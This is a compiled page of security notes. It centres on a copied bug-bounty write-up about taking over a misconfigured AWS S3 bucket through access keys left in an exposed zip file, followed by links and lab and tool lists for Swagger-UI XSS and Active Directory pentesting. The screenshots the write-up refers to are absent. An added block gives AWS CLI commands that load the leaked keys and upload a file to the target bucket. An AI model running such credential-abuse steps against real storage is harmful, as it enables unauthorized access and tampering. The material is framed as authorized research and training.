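# inside the VDI, after transferring ./wheels and requirements.txt
python -m pip install --no-index --find-links ./wheels -r requirements.txt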


https://medium.com/@pratyush1337/information-disclosure-via-misconfigured-aws-to-aws-bucket-takeover-6a6a66470d0e

 


 

Information Disclosure via Misconfigured AWS to AWS Bucket Takeover

Hey! Welcome to a new write-up on my recent finding of a misconfigured AWS bucket and how I was able to take full control of it.

I was checking out the website mainly for IDOR vulnerabilities, as those are considered high-priority bugs and are paid in a high range. I tried every possible endpoint to find any parameter where I could manipulate a numerical value, so I fired up my Burp Suite and sent the requests to the spider tab to check out all the endpoints, but I failed because they had encrypted every numerical value using a salted algorithm.

As it was not possible to find any IDOR, I instead found an interesting endpoint where I was able to set my organization's logo, and there was a direct link to the logo, which resided in an AWS bucket. You can check below:

So I checked this logo by directly copying the link and opening it in a new tab:

Basically, I never thought I would find anything like this, so I had never tried it in any of the programs or private programs I have worked on. But that day I thought: let's go to the parent directory of the file [in hacker's language: ../ ;)]. So I checked it by going to the parent directory, as you can see:

Bingo! This was a proper information disclosure due to a misconfigured ACL on the AWS bucket. I was happy and thought of reporting it directly, but as a hacker you are always overwhelmed and curious to find all the juicy information that might be possible to exploit. So without wasting any time, I went ahead to check out all the files listed in the directory, but before that I tried to access one of the files to check whether the files were real or not.

Then I opened the file to see what the content was:

Now I was confident enough that all the files available here were legitimate [use of a sophisticated word to look geeky 🤓]. We could see all the internal files of the xyz company here, with small tutorials and screenshots; this was an internal S3 bucket used for training and demonstration purposes, such as sharing screenshots of their products... I guess now you can see why it's critical.

At that moment, I felt it was enough to report, but I took a chance and wondered whether there was something else the bucket was offering that could compromise it further... Damn, is it possible? Let's see what happens... I started checking files by extension, especially .zip, .htm, .eml, .doc and .csv, and while searching through the entire bucket [which consisted of more than 700+ files] I found the first zip file:

So I downloaded it and checked the contents:

After checking the files in that zip, I figured out that it was not going to offer me anything to compromise the AWS bucket. So I kept searching for other zip files and found an interesting one in the AWS bucket:

Now I downloaded the file and opened it to check the contents:

I checked all the files, but the important one was "document.wflow"; it had everything I needed to TAKEOVER the AWS bucket. Let's check the content:

I was so happy to see these credentials, but the funny thing is that I didn't know what to do with them, because I had zero knowledge of AWS. So the best way I found was to ask one of my office colleagues, who is a dev and works on AWS. He told me: go to Google and download S3 Browser to start browsing the AWS bucket if you have the "access_key" and "secret_key". That was a very new learning experience in the field of my web application penetration testing. I was like:

 

So I downloaded it and started providing all the required credentials:

Boom!

The next thing I checked was the Access Control List permissions on each directory, and I found a directory with full access:

With full access to this directory, I was now the owner of it; I could upload any file I wanted, delete files, or delete the whole directory. I had all the access in the world, but as you all know, we stay ethical in what we do, so to make a proof of concept I uploaded a file:
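
For reference, the same proof of concept can be scripted with the AWS CLI instead of S3 Browser (profile, bucket and file names here are hypothetical; only do this with authorization):

# configure a separate profile with the leaked keys
$ aws configure set aws_access_key_id AKIA... --profile poc
$ aws configure set aws_secret_access_key ... --profile poc

# verify access, then upload a harmless proof-of-concept file
$ aws s3api get-bucket-acl --bucket target-bucket --profile poc
$ echo "poc" > poc.txt
$ aws s3api put-object --bucket target-bucket --key poc.txt --body poc.txt --profile poc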

Now, to re-verify it, I checked the public-facing bucket for my uploaded file name.

 

As a final check, I pasted the filename into the URL and checked:

Damn! AWS Bucket Takeover!

Following my initial report and its review, they promptly and fairly compensated me for letting them know about this bug. I am really thankful for that :)


https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

 

Hacking Swagger-UI - from XSS to account takeovers

We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...

blog.vidocsecurity.com

 

 


https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/

 

Penetration Testing Active Directory, Part I

I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’…

hausec.com

 

https://theredteamlabs.com/active-directory-penetration-testing/

 

Active Directory Penetration Testing and Lab Setup - RedTeam

I had several clients come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical

theredteamlabs.com

 

 


https://bhavsec.com/posts/active-directory-resources/

 

This post contains Active Directory pentesting resources to prepare for the new OSCP (2022) exam.

Youtube/Twitch Videos

Active Directory madness and the Esoteric Cult of Domain Admin! - alh4zr3d

TryHackMe - Advent of Cyber + Active Directory - tib3rius

Common Active Directory Attacks: Back to the Basics of Security Practices - TrustedSec

How to build an Active Directory Lab - The Cyber Mentor

Zero to Hero (Episode 8,9,10) - The Cyber Mentor

Blogs

Top Five Ways I Got Domain Admin on Your Internal Network before Lunch

https://medium.com/@Dmitriy_Area51/active-directory-penetration-testing-d9180bff24a1

https://book.hacktricks.xyz/windows/active-directory-methodology

https://zer1t0.gitlab.io/posts/attacking_ad/

Cheatsheets

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff

TryHackMe VIP/Free Labs

Active Directory Basics - Easy

Post-Exploitation Basics - Easy

Vulnnet Roasted - Easy

Attacktive Directory - Medium

raz0r black - Medium

Enterprise - Medium

Vulnnet Active - Medium

Zero Logon - Hard

TryHackMe Paid Labs ($10 - $60 / month)

Holo - Hard

Throwback - Easy

HackTheBox Subscription/Free Labs

Forest - Easy

Active - Easy

Fuse - Medium

Cascade - Medium

Monteverde - Medium

Resolute - Medium

Arkham - Medium

Mantis - Hard

APT - Insane

HackTheBox Pro Labs ($95 + $27/month)

Dante - Beginner

Offshore - Intermediate

RastaLabs - Intermediate

Cybernetics - Advanced

APT Labs - Advanced

HackTheBox Academy (Paid)

ActiveDirectory LDAP - Medium

ActiveDirectory Powerview - Medium

ActiveDirectory BloodHound - Medium

CyberSecLabs Walkthrough

Secret

Zero

Brute

Dictionary

Roast

Spray

Sync

Toast

Certifications

OSCP - Offensive Security Certified Professional - Offsec - Intermediate

CRTP - Certified Red Team Professional - Pentester Academy - Beginner

CRTE - Certified Red Team Expert - Pentester Academy - Expert

CRTO - Certified Red Team Operator - Zeropoint Security - Intermediate

Courses

Practical Ethical Hacking - TCM Security

Active Directory Pentesting Full Course - Red Team Hacking

Red Team Ethical Hacking - Beginner

Red Team Ethical Hacking - Intermediate

Tools and Repositories

Nishang

Mimikatz

Kekeo

Rubeus

Powersploit

Powercat

PowerUpSQL

HeidiSQL

Proving Grounds Playground - Offensive Security

Hutch, Heist & Vault
